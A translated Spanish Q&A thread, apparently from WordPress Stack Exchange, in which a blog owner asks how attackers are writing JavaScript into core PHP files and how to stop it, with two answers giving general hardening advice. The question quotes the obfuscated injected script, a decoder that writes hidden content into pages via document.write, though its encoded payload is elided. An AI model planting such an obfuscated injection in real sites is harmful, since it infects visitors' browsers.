¿Cómo los atacantes escriben el script en mis archivos php?

4

Tengo un blog creado con wordpress, ahora tengo un problema. Los atacantes escriben códigos javascript en mis archivos.

Supongamos que tengo agujeros en mis scripts de complementos, pero ¿cómo pueden escribir en archivos php?

aquí es parte de la lista de archivos php, en la que escriben el script ( index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ... )

y este es el javascript que escriben

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

¿Cómo puedo prevenir estos ataques?

No tengo ninguna experiencia con wordpress, por lo que cualquier ayuda será muy buena.

Muchas gracias

    
pregunta Syom 31.01.2011 - 13:57

2 respuestas

5

Hola @Syom:

A menudo, los piratas informáticos obtienen acceso porque usa el nombre "admin" para su administrador y tiene una contraseña fácil de hackear. O porque no actualiza su software y aprovechan algunos de los agujeros de seguridad encontrados y parcheados.

Aquí hay un conjunto de diapositivas que explican cómo proteger su sitio de WordPress que se presentaron en WordCamp Phoenix el fin de semana pasado:

Aquí hay algunas publicaciones de blog de Otto sobre el tema:

respondido por el MikeSchinkel 31.01.2011 - 14:06
1

Hay varias formas posibles:

  • inicio de sesión FTP / SSH comprometido;
  • inicio de sesión de WordPress comprometido;
  • configuración de seguridad del servidor defectuoso;
  • servidor comprometido;
  • algún tipo de puerta trasera instalada;
  • etc.

Debería ponerse en contacto con el servicio de asistencia de hosting de inmediato, luego dependerá de la calidad y el precio de su alojamiento. ¿Cuánto ayudarán?

Aparte de eso, si no confía en las habilidades técnicas, le sugiero que busque a alguien que se ocupe de la limpieza de blogs pirateados profesionalmente, de lo contrario, no estará seguro de los detalles de piratería y seguridad en el futuro.

    
respondido por el Rarst 31.01.2011 - 14:57

Lea otras preguntas en las etiquetas